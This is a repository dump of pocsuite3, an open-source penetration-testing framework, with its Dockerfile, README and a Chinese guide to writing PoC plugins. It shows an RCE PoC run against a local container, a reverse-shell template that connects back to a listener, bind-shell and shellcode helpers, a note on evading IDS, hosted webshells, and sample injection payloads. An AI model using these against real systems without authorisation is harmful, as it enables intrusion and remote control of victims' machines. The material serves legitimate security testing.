Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
****************************************************************************
================================================
FILE: Dockerfile
================================================
FROM ubuntu:22.04
LABEL maintainer="Knownsec 404 Team"
ARG version
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update \
&& apt-get install -y \
python3 \
python3-pip \
net-tools \
nload \
htop \
tmux \
vim \
wget \
curl \
zsh \
&& apt-get install -y sudo \
&& useradd -m pocsuite3 \
&& passwd --delete --unlock pocsuite3 \
&& echo "pocsuite3 ALL=(ALL:ALL) NOPASSWD: ALL" > /etc/sudoers.d/pocsuite3
USER pocsuite3
RUN sh -c "$(wget -O- https://raw.githubusercontent.com/13ph03nix/zsh-in-docker/master/zsh-in-docker.sh)" -- \
-t https://github.com/spaceship-prompt/spaceship-prompt \
-p git \
-p https://github.com/zsh-users/zsh-autosuggestions \
-p https://github.com/zsh-users/zsh-completions \
&& sudo apt-get autoremove -y \
&& sudo apt-get clean -y \
&& sudo rm -rf /var/lib/apt/lists/*
RUN sudo pip3 install --upgrade pip && sudo pip3 install --upgrade pocsuite3$([ -n "$version" ] && echo "=="${version})
WORKDIR /home/pocsuite3
CMD ["zsh"]
================================================
FILE: MANIFEST.in
================================================
include MANIFEST.in
include LICENSE
include README.md
include CHANGELOG.md
include CONTRIBUTORS.md
recursive-include pocsuite3 *
recursive-exclude pocsuite3 __pycache__
recursive-exclude pocsuite3 *.py[co]
================================================
FILE: README.md
================================================
# pocsuite3
[](https://www.python.org/) [](https://raw.githubusercontent.com/knownsec/pocsuite3/master/COPYING) [](https://twitter.com/seebug_team)
## Legal Disclaimer
Usage of pocsuite3 for attacking targets without prior mutual consent is illegal.
pocsuite3 is for security testing purposes only
## 法律免责声明
未经事先双方同意,使用 pocsuite3 攻击目标是非法的。
pocsuite3 仅用于安全测试目的
## Overview
pocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the [**Knownsec 404 Team**](http://www.knownsec.com/).
It comes with a powerful proof-of-concept engine, many nice features for the ultimate penetration testers and security researchers.
## Features
* PoC scripts can running with `verify`, `attack`, `shell` mode in different way
* Plugin ecosystem
* Dynamic loading PoC script from anywhere (local file, redis, database, Seebug ...)
* Load multi-target from anywhere (CIDR, local file, redis, database, Zoomeye, Shodan ...)
* Results can be easily exported
* Dynamic patch and hook requests
* Both command line tool and python package import to use
* IPv6 support
* Global HTTP/HTTPS/SOCKS proxy support
* Simple spider API for PoC script to use
* YAML PoC support, compatible with [nuclei](https://github.com/projectdiscovery/nuclei)
* Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)
* Integrate with [ZoomEye](https://www.zoomeye.org), [Shodan](https://www.shodan.io), etc. (for load target use `Dork`)
* Integrate with [Ceye](http://ceye.io/), [Interactsh](https://github.com/projectdiscovery/interactsh) (for verify blind DNS and HTTP request)
* Friendly debug PoC scripts with IDEs
* More ...
## Screenshots
### pocsuite3 console mode
[](https://asciinema.org/a/219356)
### pocsuite3 shell mode
[](https://asciinema.org/a/203101)
### pocsuite3 load PoC from Seebug
[](https://asciinema.org/a/207350)
### pocsuite3 load multi-target from ZoomEye
[](https://asciinema.org/a/133344)
### pocsuite3 load multi-target from Shodan
[](https://asciinema.org/a/207349)
### pocsuite3 load nuclei template
### build a docker vulnerability environment
**require Docker**
write dockerfile in poc
```python
class DemoPOC(POCBase):
vulID = '' # ssvid
version = '1.0'
author = ['']
vulDate = '2029-5-8'
createDate = '2019-5-8'
updateDate = '2019-5-8'
references = ['']
name = 'Struts2 045 RCE CVE-2017'
appPowerLink = ''
appName = 'struts2'
appVersion = ''
vulType = ''
desc = '''S2-045:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3)'''
samples = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''
```
#### only run vulnerable environments
```python
pocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py --docker-start --docker-port 127.0.0.1:8080:8080 --docker-env A=test --docker-port 8899:7890
,------. ,--. ,--. ,----. {2.0.6-cc19ae5}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org
[*] starting at 15:34:12
[15:34:12] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py'
[15:34:12] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists
[15:34:12] [INFO] Run container fa5b3b7bb2ea successful!
[15:34:12] [INFO] pocsusite got a total of 0 tasks
[15:34:12] [INFO] Scan completed,ready to print
```
#### run vulnerable environments and run poc
```python
pocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py -u http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action --docker-start --docker-port 127.0.0.1:8080:8080
,------. ,--. ,--. ,----. {2.0.6-cc19ae5}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org
[*] starting at 15:38:46
[15:38:46] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py'
[15:38:46] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists
[15:38:47] [INFO] Run container 1a6eae1e8953 successful!
[15:38:47] [INFO] pocsusite got a total of 1 tasks
[15:38:47] [INFO] running poc:'Struts2 045 RCE CVE-2017' target 'http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action'
[15:39:17] [+] URL : http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action
[15:39:17] [+] Headers : {'Server': 'Apache-Coyote/1.1', 'nyvkx': '788544', 'Set-Cookie': 'JSESSIONID=0A9892431B32A541B51D4721FA0D2728; Path=/S2-032-showcase/; HttpOnly', 'Content-Type': 'text/html;charset=ISO-8859-1', 'Transfer-Encoding': 'chunked', 'Date': 'Mon, 25 Dec 2023 07:39:17 GMT'}
[15:39:17] [INFO] Scan completed,ready to print
+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+
| target-url | poc-name | poc-id | component | version | status |
+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+
| http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action | Struts2 045 RCE CVE-2017 | | struts2 | | success |
+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+
success : 1 / 1
```
#### Introduction to vulnerability environment construction
```shell
Docker Environment:
Docker Environment options
--docker-start Run the docker for PoC
--docker-port DOCKER_PORT
Publish a container's port(s) to the host
--docker-volume DOCKER_VOLUME
Bind mount a volume
--docker-env DOCKER_ENV
Set environment variables
--docker-only Only run docker environment
```
- `--docker-start` Start environment parameters. If specified, docker images will be obtained from poc.
- `--docker-port` publish a container's port(s) to the host, like: `--docker-port [host port]:[container port]`,you can specify multiple
- `--docker-volume` bind mount a volume,like `--docker-volume /host/path/:/container/path`,you can specify multiple
- `--docker-env` set environment variables `--docker-env VARIBLES=value`,you can specify multiple
- `--docker-only` only start the docker environment
The usage is roughly the same as docker’s command line parameters.
## Requirements
- Python 3.8+
- Works on Linux, Windows, Mac OSX, BSD, etc.
## Installation
Paste at a terminal prompt:
### Python pip
``` bash
pip3 install pocsuite3
# use other pypi mirror
pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3
```
### MacOS
``` bash
brew update
brew info pocsuite3
brew install pocsuite3
```
### [Debian](https://tracker.debian.org/pkg/pocsuite3), [Ubuntu](https://launchpad.net/ubuntu/+source/pocsuite3), [Kali](http://pkg.kali.org/pkg/pocsuite3)
``` bash
sudo apt update
sudo apt install pocsuite3
```
### Docker
```
docker run -it pocsuite3/pocsuite3
```
### ArchLinux
``` bash
yay pocsuite3
```
###
Or click [here](https://github.com/knownsec/pocsuite3/archive/master.zip) to download the latest source zip package and extract
``` bash
wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip
cd pocsuite3-master
pip3 install -r requirements.txt
python3 setup.py install
```
The latest version of this software is available at: https://pocsuite.org
## Documentation
Documentation is available at: https://pocsuite.org
## Usage
```
cli mode
# basic usage, use -v to set the log level
pocsuite -u http://example.com -r example.py -v 2
# run poc with shell mode
pocsuite -u http://example.com -r example.py -v 2 --shell
# search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20
pocsuite -r redis.py --dork service:redis --threads 20
# load all poc in the poc directory and save the result as html
pocsuite -u http://example.com --plugins poc_from_pocs,html_report
# load the target from the file, and use the poc under the poc directory to scan
pocsuite -f batch.txt --plugins poc_from_pocs,html_report
# load CIDR target
pocsuite -u 10.0.0.0/24 -r example.py
# the custom parameters `command` is implemented in ecshop poc, which can be set from command line options
pocsuite -u http://example.com -r ecshop_rce.py --attack --command "whoami"
console mode
poc-console
```
## How to Contribute
1. Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
2. Fork [the repository](https://github.com/knownsec/pocsuite3) on GitHub to start making your changes.
3. Write a test which shows that the bug was fixed or that the feature works as expected.
4. Send a pull request or bug to the maintainer until it gets merged or fixed. Make sure to add yourself to [Contributors](./CONTRIBUTORS.md).
## Links
* [Contributors](./CONTRIBUTORS.md)
* [ChangeLog](./CHANGELOG.md)
* [Bug tracking](https://github.com/knownsec/pocsuite3/issues)
* [Copyright](./COPYING)
* [Pocsuite](https://pocsuite.org)
* [Seebug](https://www.seebug.org)
* [ZoomEye](https://www.zoomeye.org)
* [Knownsec](https://www.knownsec.com)
================================================
FILE: docs/CODING.md
================================================
# This document has stopped maintenance, please move to https://pocsuite.org
Pocsuite3 开发文档及 PoC 编写规范及要求说明
---
* [概述](#overview)
* [插件编写规范](#write_plugin)
* [TARGETS 类型插件](#plugin_targets)
* [POCS 类型插件](#plugin_pocs)
* [RESULTS 类型插件](#plugin_results)
* [PoC 编写规范](#write_poc)
* [PoC python 脚本编写步骤](#pocpy)
* [可自定义参数的 PoC](#可自定义参数的插件<div-id="plugin_div"></div>)
* [PoC 编写注意事项](#attention)
* [Pocsuite3 远程调用文件列表](#inclue_files)
* [通用API列表](#common_api)
* [通用方法](#api_common)
* [参数调用](#api_params)
* [PoC 代码示例](#PoCexample)
* [PoC Python 代码示例](#pyexample)
* [Pocsuite3 集成调用](#pocsuite_import)
* [PoC 规范说明](#PoCstandard)
* [PoC 编号说明](#idstandard)
* [PoC 命名规范](#namedstandard)
* [PoC 第三方模块依赖说明](#requires)
* [PoC 结果返回规范](#resultstandard)
* [extra 字段说明](#result_extara)
* [通用字段说明](#result_common)
* [漏洞类型规范](#vulcategory)
### 概述<div id="overview"></div>
本文档为 Pocsuite3 插件及 PoC 脚本编写规范及要求说明,包含了插件、PoC 脚本编写的步骤以及相关 API 的一些说明。一个优秀的 PoC 离不开反复的调试、测试,在阅读本文档前,请先阅读 [《Pocsuite3 使用文档》](./USAGE.md)。或参考 https://paper.seebug.org/904/ 查看 Pocsuite3 的一些新特性。
### 插件编写规范<div id="write_plugin"></div>
Pocsuite3 共有三种类型的插件,定义在 `pocsuite3.lib.core.enums.PLUGIN_TYPE` 中。
#### TARGETS 类型插件<div id="plugin_targets"></div>
TARGETS 类型插件用来自定义在系统初始化时候加载检测目标的功能,例如从 redis 或数据库加载 targets
```python
from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import register_plugin
class TargetPluginDemo(PluginBase):
category = PLUGIN_TYPE.TARGETS
def init(self):
targets = ['www.a.com', 'www.b.com'] # load from redis, database ...
count = 0
for target in targets:
if self.add_target(target):
count += 1
info_msg = "[PLUGIN] get {0} target(s) from demo".format(count)
logger.info(info_msg)
register_plugin(TargetPluginDemo)
```
#### POCS 类型插件<div id="plugin_pocs"></div>
POCS 类型插件用来自定义在系统初始化时候加载 PoC 脚本的功能,例如从 redis 或数据库加载 PoC 脚本代码
```python
from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import register_plugin
class TargetPluginDemo(PluginBase):
category = PLUGIN_TYPE.POCS
def init(self):
pocs = [POC_CODE_1, POC_CODE_2] # load PoC code from redis, database ...
count = 0
for poc in pocs:
if poc and self.add_poc(poc):
count += 1
info_msg = "[PLUGIN] get {0} poc(s) from demo".format(count)
logger.info(info_msg)
register_plugin(TargetPluginDemo)
```
#### RESULTS 类型插件<div id="plugin_results"></div>
RESULTS 类型插件用来自定义检测结果的导出,例如导出 html 报表等
```python
from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import get_results
from pocsuite3.api import register_plugin
class HtmlReport(PluginBase):
category = PLUGIN_TYPE.RESULTS
def init(self):
debug_msg = "[PLUGIN] html_report plugin init..."
logger.debug(debug_msg)
def start(self):
# TODO
# Generate html report
for result in get_results():
pass
info_msg = '[PLUGIN] generate html report done.'
logger.info(info_msg)
register_plugin(HtmlReport)
```
若需要实时的保存结果,需要申明 `handle` 来处理,可参考 https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/plugins/file_record.py 的写法。
### PoC 编写规范<div id="write_poc"></div>
#### PoC python 脚本编写步骤<div id="pocpy"></div>
本小节介绍 PoC python 脚本编写
Pocsuite3 仅支持 Python 3.x,如若编写 Python3 格式的 PoC,需要开发者具备一定的 Python3 基础
1. 首先新建一个 `.py` 文件,文件名应当符合 [《PoC 命名规范》](#namedstandard)
2. 编写 PoC 实现类 `DemoPOC`,继承自 `PoCBase` 类.
```python
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
class DemoPOC(POCBase):
...
```
3. 填写 PoC 信息字段,**请认真填写所有基本信息字段**
```python
vulID = '99335' # Seebug 漏洞收录ID,如果没有则为0
version = '1' # PoC 的版本,默认为1
author = 'seebug' # PoC 的作者
vulDate = '2021-8-18' # 漏洞公开日期 (%Y-%m-%d)
createDate = '2021-8-20' # PoC 编写日期 (%Y-%m-%d)
updateDate = '2021-8-20' # PoC 更新日期 (%Y-%m-%d)
references = ['https://www.seebug.org/vuldb/ssvid-99335'] # 漏洞来源地址,0day 不用写
name = 'Fortinet FortiWeb 授权命令执行 (CVE-2021-22123)' # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> <cve编号>
appPowerLink = 'https://www.fortinet.com' # 漏洞厂商主页地址
appName = 'FortiWeb' # 漏洞应用名称
appVersion = '<=6.4.0' # 漏洞影响版本
vulType = 'Code Execution' # 漏洞类型,参见漏洞类型规范表
desc = '/api/v2.0/user/remoteserver.saml接口的name参数存在命令注入' # 漏洞简要描述
samples = ['http://192.168.1.1'] # 测试样列,就是用 PoC 测试成功的目标
install_requires = ['BeautifulSoup4:bs4'] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
pocDesc = ''' poc的用法描述 '''
dork = {'zoomeye': 'deviceState.admin.hostname'} # 搜索 dork,如果运行 PoC 时不提供目标且该字段不为空,将会调用插件从搜索引擎获取目标。
suricata_request = '''http.uri; content: "/api/v2.0/user/remoteserver.saml";''' # 请求流量 suricata 规则
suricata_response = '' # 响应流量 suricata 规则
```
4. 编写验证模式
```python
def _verify(self):
output = Output(self)
# 验证代码
if result: # result是返回结果
output.success(result)
else:
output.fail('target is not vulnerable')
return output
```
5. 编写攻击模式
攻击模式可以对目标进行 getshell,查询管理员帐号密码等操作,定义它的方法与检测模式类似
```python
def _attack(self):
output = Output(self)
result = {}
# 攻击代码
```
和验证模式一样,攻击成功后需要把攻击得到结果赋值给 result 变量
**注意:如果该 PoC 没有攻击模式,可以在 \_attack() 函数下加入一句 return self.\_verify() 这样你就无需再写 \_attack 函数了。**
6. 编写shell模式 [**new**]
Pocsuite3 在 shell 模式会默认监听 `6666` 端口,编写对应的攻击代码,让目标执行反向连接运行 Pocsuite3 系统 IP 的 `6666` 端口即可得到一个 shell
```python
def _shell(self):
cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
# 攻击代码 execute cmd
```
shell 模式下,只能运行单个 PoC 脚本,控制台会进入 shell 交互模式执行命令及输出
从 ***1.8.5*** 版本开始,Pocsuite3 支持 bind shell。shell 模式和原来的操作方式一致,也需要指定监听 ip 和端口,监听 ip 可以是本地任意 ip,也可以是远程 vps ip。
bind shell 的实现位于 `./pocsuite3/modules/listener/bind_tcp.py`,原理是实现了一个中间层,一端连接漏洞目标的 bind shell(如 telnet 服务、nc 启动的 shell、php 一句话等),另一端连接用户指定的监听 ip 和端口,如此一来,shell 模式可以不受网络环境限制,支持在内网使用。
目前支持三种 bind shell,使用场景如下:
`bind_shell`:通用方法,在 shell 模式中直接调用 `return bind_shell(self, rce_func)` 即可,非常便捷。针对有回显的漏洞,在 PoC 中实现一个 rce(函数名可自定义)方法,函数参数为命令输入,输出为命令输出。如果漏洞无回显,也可以通过写一句话转为有回显的。值得一提的是,用户也可以在 rce 方法中实现流量的加解密以逃避 IDS 检测。
`bind_tcp_shell`:对 tcp 绑定型 shell 的原生支持,在 shell 模式中 `return bind_tcp_shell(bind_shell_ip, bind_shell_port)`
`bind_telnet_shell`:对 telnet 服务的原生支持,在 shell 模式中 `return bind_telnet_shell(ip, port, username, password)`
从 ***1.8.6*** 版本开始,Pocsuite3 支持加密的 shell。PoC 中使用 openssl 的反弹命令(也可以用代码反弹),并且在运行时指定 `--tls` 选项。
7. 结果返回
不管是验证模式或者攻击模式,返回结果 result 中的 key 值必须按照下面的规范来写,result 各字段意义请参见[《PoC 结果返回规范》](#resultstandard)
```
'Result':{
'DBInfo' : {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx' , 'Uid':'xxx' , 'Groupid':'xxx'},
'ShellInfo': {'URL': 'xxx', 'Content': 'xxx' },
'FileInfo': {'Filename':'xxx','Content':'xxx'},
'XSSInfo': {'URL':'xxx','Payload':'xxx'},
'AdminInfo': {'Uid':'xxx' , 'Username':'xxx' , 'Password':'xxx' }
'Database': {'Hostname':'xxx', 'Username':'xxx', 'Password':'xxx', 'DBname':'xxx'},
'VerifyInfo':{'URL': 'xxx' , 'Postdata':'xxx' , 'Path':'xxx'}
'SiteAttr': {'Process':'xxx'}
'Stdout': 'result output string'
}
```
output 为 Pocsuite3 标准输出 API,如果要输出调用成功信息则使用 `output.success(result)`,如果要输出调用失败则 `output.fail()`,系统自动捕获异常,不需要 PoC 里处理捕获,如果 PoC 里使用 try...except 来捕获异常,可通过`output.error('Error Message')` 来传递异常内容,建议直接使用模板中的 parse_output 通用结果处理函数对 _verify 和 _attack 结果进行处理。
```
def _verify(self, verify=True):
result = {}
...
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
```
8. 注册 PoC 实现类
在类的外部调用 register_poc() 方法注册 PoC 类
```
class DemoPOC(POCBase):
# POC内部代码
# 注册 DemoPOC 类
register_poc(DemoPOC)
```
#### 可自定义参数的 PoC<div id="plugin_div"></div>
如果你需要编写一个可以交互参数的 PoC 文件(例如有的 PoC 脚本需要填写登录信息,或者任意命令执行时执行任意命令),那么可以在 PoC 文件中声明一个 `_options` 方法。一个简单的例子如下:
```python
from collections import OrderedDict
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OptString
class DemoPOC(POCBase):
vulID = '0' # ssvid
version = '1.0'
author = ['seebug']
vulDate = '2019-2-26'
createDate = '2019-2-26'
updateDate = '2019-2-25'
references = ['']
name = '自定义命令参数登录例子'
appPowerLink = 'http://www.knownsec.com/'
appName = 'test'
appVersion = 'test'
vulType = VUL_TYPE.XSS
desc = '''这个例子说明了你可以使用console模式设置一些参数或者使用命令中的'--'来设置自定义的参数'''
samples = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
def _options(self):
o = OrderedDict()
o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
o["password"] = OptString('', description='这个poc需要用户密码,请输出用户密码', require=False)
return o
def _verify(self):
result = {}
payload = "username={0}&password={1}".format(self.get_option("username"), self.get_option("password"))
r = requests.post(self.url, data=payload)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Postdata'] = payload
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
```
它可以使你在 `console` 或者 `cli` 模式下调用。
- 在 console 模式下,Pocsuite3 模仿了 msf 的操作模式,你只需要使用 `set` 命令来设置相应的参数,然后 `run` 或者 `check` 来执行(`attack` 和 `shell` 命令也可以)。
- 在 cli 模式下,如上面例子所示,定义了 `username` 和 `password` 两个字段,你可以在参数后面加上 `--username test --password test` 来调用执行,需要注意的是,如果你的参数中包含了空格,用双引号 `"` 来包裹它。
##### 自定义字段
像其他工具一样,如果你想使用自定义的字段,将它定义到 `_options` 方法中,然后返回一个数组。如果在 PoC 文件中想调用自定义字段,需要提前引入:
```python
from pocsuite3.api import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
```
| 字段类型 | 字段描述 | 参数解释 | 相关例子 |
| ---------- | ------------------------------------------------------------ | ------------------------------------------------------------ | -------- |
| OptString | 接收字符串类型参数 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptDict | 接收一个字典类型参数,在选择上如果选择key,调用时会调用对应的value | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptIP | 接收IP类型的字符串 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptPort | 接收端口类型参数 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptBool | 接收布尔类型参数 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptInteger | 接收整数类型参数 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptFloat | 接收浮点数类型参数 | default: 传入一个默认值<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
| OptItems | 接收list类型参数 | default: 传入一个默认值<br />selectd: 默认选择<br />descript: 字段描述,默认为空<br />require: 是否必须,默认False | |
需要注意的是,`console` 模式支持所有的参数类型,`cli` 模式除了`OptDict`、`OptBool`、`OptItems` 类型外都支持。
#### PoC 编写注意事项<div id="attention"></div>
1. 要求在编写 PoC 的时候,尽量的不要使用第三方模块,如果在无法避免的情况下,请认真填写 install_requires 字段,填写格式参考《PoC 第三方模块依赖说明》。
2. 要求编写 PoC 的时候,尽量的使用 Pocsuite3 已经封装的 API 提供的方法,避免自己重复造轮子,对于一些通用方法可以加入到 API,具体参考《通用 API 列表》。
3. 如果 PoC 需要包含远程文件等,统一使用 Pocsuite3 远程调用文件,具体可以参考[《Pocsuite3 远程调用文件列表》](#inclue_files),不要引入第三方文件,如果缺少对应文件,联系管理员添加。
4. 要求每个 PoC 在编写的时候,尽可能的不要要求输入参数,这样定制化过高,不利于 PoC 的批量化调度执行,尽可能的 PoC 内部实现参数的构造,至少应该设置默认值,如某个 PoC 需要指定用户id,那么应该允许使用 extar_param 传入 id,也应该没有传入该参数的时候自动设置默认值,不应该影响 PoC 的正常运行与验证。
5. 要求每个 PoC 在输出结果的时候,尽可能的在不破坏的同时输出取证信息,如输出进程列表,具体参考[《PoC 结果返回规范》](#resultstandard)。
6. 要求认真填写 PoC 信息字段,其中 vulID 请填写 Seebug 上的漏洞 ID(不包含 SSV-)。
7. 为了防止误报产生以及避免被关键词被 WAF 等作为检测特征,要求验证结果判断的时候输出随机的字符串(可以调用 API 中的`random_str`方法),而不用采用固定字符串。
比如:
```
检测 SQL 注入时:
token = random_str()
payload = 'select md5(%s)' % token
...
if hashlib.new('md5', token).hexdigest() in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
检测 XSS 漏洞时:
# 可参考 https://paper.seebug.org/1119/
token = random_str()
payload = 'alert("%s")' % token
...
if payload in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
检测 PHP 文件上传是否成功:
token = random_str()
payload = '<?php echo md5("%s");unlink(__FILE__);?>' % token
...
if hashlib.new('md5', token).hexdigest() in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
```
8. 任意文件如果需要知道网站路径才能读取文件的话,可以读取系统文件进行验证,要写 Windows 版和 Linux 版两个版本。
9. 检测模式下,上传的文件一定要删掉。
10. 程序可以通过某些方法获取表前缀,just do it;若不行,保持默认表前缀。
11. PoC 编写好后,务必进行测试,测试规则为:5 个不受漏洞影响的网站,确保 PoC 攻击不成功;5 个受漏洞影响的网站,确保 PoC 攻击成功
#### Pocsuite3 远程调用文件列表<div id="inclue_files"></div>
部分 PoC 需要采用包含远程文件的形式,要求基于 Pocsuite3 的 PoC 统一调用统一文件(如需引用未在以下文件列表内文件,请联系 404-team@knownsec.com 或者直接提交 issue)。
统一 URL 调用路径:`https://pocsuite.org/include_files/`,如 `https://pocsuite.org/include_files/xxe_verify.xml`
**文件列表**
|文件名|说明|
|-----|---|
|a.jsp|一个通用简单的 JSP 一句话 Shell,攻击模式|
|b.jsp|一个通用简单的 JSP 一句话 Shell,验证模式|
|php_attack.txt|PHP 一句话|
|php_verify.txt|PHP 打印 md5 值|
|xxe_verify.xml|XXE 验证文件|
#### 通用 API 列表<div id="common_api"></div>
在编写 PoC 的时候,相关方法请尽量调用通用的已封装的 API
**通用方法**<div id="api_common"></div>
|方法|说明|
|---|----|
|from pocsuite3.api import logger|日志记录,比如logger.log(info)|
|from pocsuite3.api import requests|请求类,用法同 requests|
|from pocsuite3.api import Seebug|Seebug api 调用|
|from pocsuite3.api import ZoomEye|ZoomEye api 调用|
|from pocsuite3.api import CEye|Ceye api 调用|
|from pocsuite3.api import crawl|简单爬虫功能|
|from pocsuite3.api import PHTTPServer|Http服务功能|
|from pocsuite3.api import REVERSE_PAYLOAD|反向连接shell payload|
|from pocsuite3.api import get_results|获取结果|
**参数调用**<div id="api_params"></div>
* self.headers 用来获取 http 请求头, 可以通过 --cookie, --referer,--user-agent,--headers 来修改和增加需要的部分
* self.params 用来获取 --extra-params 赋值的变量,Pocsuite3 会自动转化成字典格式,未赋值时为空字典
* self.url 用来获取 -u / --url 赋值的 URL,如果之前赋值是 baidu.com 这样没有协议的格式时, Pocsuite3 会自动转换成 http://baidu.com
##### ShellCode 生成支持
在一些特殊的 Linux 和 Windows 环境下,想得到反弹 shell 条件比较困难。为此我们制作了用于在 Windows/Linux x86 x64 环境下的用于反弹的 shellcode,并制作了接口支持,你在只需要拥有命令执行权限下便可以自动将 shellcode 写入到目标机器以及执行反弹 shell 命令。Demo Poc:https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/thinkphp_rce2.py
```python
from pocsuite3.api import generate_shellcode_list
_list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86)
```
